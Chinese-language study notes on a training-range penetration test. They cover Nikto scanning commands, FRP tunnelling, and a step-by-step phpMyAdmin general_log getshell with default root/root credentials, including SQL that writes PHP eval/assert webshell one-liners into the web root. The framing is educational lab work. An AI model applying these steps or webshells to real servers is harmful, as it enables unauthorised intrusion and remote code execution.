提取文章概要
第一次听说Nikto:用Nikto工具对192.168.2.244进行扫描发现有phpMyAdmin。
内网穿透方式:FRP+Proxifier。
内网机器执行客户端:nohup ./frpc -c frpc.ini &
公网VPS执行服务端:nohup ./frps -c frps.ini &
phpmyadmin默认账号密码root/root,利用general_log成功getshell。
(执行具体命令,见参考文章)
注意:由于目标用的PHP7.0.12,可能会导致很多大马和一句话木马都用不了,或者在中国菜刀连接时会出现报错,因为PHP7移除了set_magic_quotes_runtime函数,而中国菜刀的数据包中又含有set_magic_quotes_runtime。(大马内容,见参考文章)
机器可以访问外网,执行CS木马,便于后期对192.168.3.x网段测试。
利用Meterpreter、配置proxychains进行后续内网渗透。
了解学习
网页扫描神器Nikto
初步介绍
Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。(GNU公共许可证,表示自由软件)
Nikto是一个用来发现默认网页文件、检查网页服务器和CGI安全问题的工具。Perl语言开发,命令行工具。
操作系统:Linux,FreeBSD,UNIX(Kali自带)
开发公司:开源。作者是Chris Sullo,是开放安全基金会的财务总监。
官方网站:https://cirt.net/
初步利用
常规扫描:执行命令nikto -host/-h ip或域名,默认扫描80端口。
指定端口扫描:nikto -h ip或域名 -p 443
指定目录扫描:nikto -h ip或域名 -c /dvwa,使用-c all表示目录爆破并扫描
多目标扫描:nikto -host mylist.txt
输出扫描结果:nikto -host ip或域名 -o result.html -F htm/txt/csv/xml
使用代理扫描:nikto -h URL -useproxy http://127.0.0.1:1080
(当然,需要配合其他代理工具使用,比如proxychains)
软件更新:nikto -update。
组件默认密码:nikto官网还发布了各大组件的默认密码,可以访问https://cirt.net/passwords进行查看。
phpMyAdmin日志general_log拿shell
复现环境和利用情况
使用墨者靶场复现:数据库mysql/5.0.1、数据库管理工具phpMyAdmin/4.8.1、编程语言PHP/5.6.39。
使用默认账号口令root/root登录phpMyAdmin。
利用genaral_log拿shell。前提:登录phpMyAdmin,知道绝对路径。需要root用户能够查看日志,最好是Windows操作系统。
未成功原因:Linux操作系统下,root访问日志提示“access denied”。
具体过程:
phpMyAdmin执行SQL语句:show GLOBAL VARIABLES like “%general%”;
选择特定的数据库mysql。成功开启日志:set GLOBAL general_log=‘on’;
查询数据库绝对路径:select @@basedir;
指定日志存储文件:set global general_log_file=’/var/www/html/cmd.php’;
访问日志文件,是否能够查看,而不是“access denied”。
通过查询注入木马语句:SELECT “<?php $z0=str_replace('@set_magic_quotes_runtime(0);','',base64_decode($_POST['z0']));$_POST['z0']=base64_encode($z0);@eval($_POST['cmd']);?>”;
或写入一句话木马:select ‘<?php assert($_POST["v01cano"]); ?>’
连接木马。关闭日志:set global general_log=‘off’
对靶场进行目录扫描,没有发现phpinfo.php。
查询数据库绝对路径:select @@basedir;
知道/usr,所以目标操作系统是Linux,猜测网站根目录是/var/www/html。
注入木马:
访问设置的文件,发现拒绝访问,使用蚁剑和菜刀无法连接:
成功的案例中,root用户能够访问日志文件。Linux的访问控制针不戳。
参考
《靶场攻略 | 某大学实战靶场记录》,2021-03
文章地址https://mp.weixin.qq.com/s/aZs_mXzGtxuLJGtdV6_6XQ
《Nikto-百度百科》
《Web漏洞扫描神器Nikto使用指南》,2020-04
文章地址https://zhuanlan.zhihu.com/p/124246499
《漏洞扫描工具nikto使用心得》,2014-11
文章地址https://blog.csdn.net/mydriverc2/article/details/41365687
《利用general_log来getshell》,2019-03
文章地址https://blog.csdn.net/Blue_Starry_sky/article/details/88119104